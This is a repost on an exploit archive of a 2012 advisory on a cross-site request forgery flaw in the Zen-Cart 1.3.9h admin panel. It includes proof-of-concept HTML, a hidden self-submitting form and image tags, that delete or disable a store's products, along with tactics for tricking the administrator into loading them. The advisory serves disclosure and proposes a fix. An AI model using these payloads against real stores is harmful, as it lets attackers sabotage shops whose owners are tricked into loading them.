exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zen-Cart 1.3.9h Cross Site Request Forgery

Zen-Cart 1.3.9h Cross Site Request Forgery
Posted Feb 11, 2012
Authored by DisK0nn3cT

Zen-Cart version 1.3.9h suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2011-4403
SHA-256 | ef286cbf4e4b4530afcb9dd37b44ca77c53e9e70a3ed3ba5031156b4e02ae852

Zen-Cart 1.3.9h Cross Site Request Forgery

Change Mirror Download
*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from
within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
* Social Engineer an admin user (trick them)
* Packet Capture
* Email headers
* Invoice print out
* * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
* This is public information
4. The attack must then social engineer (trick them) into loading the page
* Email with images
* Post a forum topic with the images
* Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm"
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5
"/>

Proposed Solution

* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close